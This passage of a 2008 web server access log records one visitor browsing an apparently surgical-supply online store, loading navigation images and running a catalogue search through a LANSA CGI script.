213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:41 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:43 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:24:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5F16FE2115126300AD95061+M37+ENG HTTP/1.1" 200 37680 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:32:53 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:32:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:32:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:32:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:13 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:34:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+w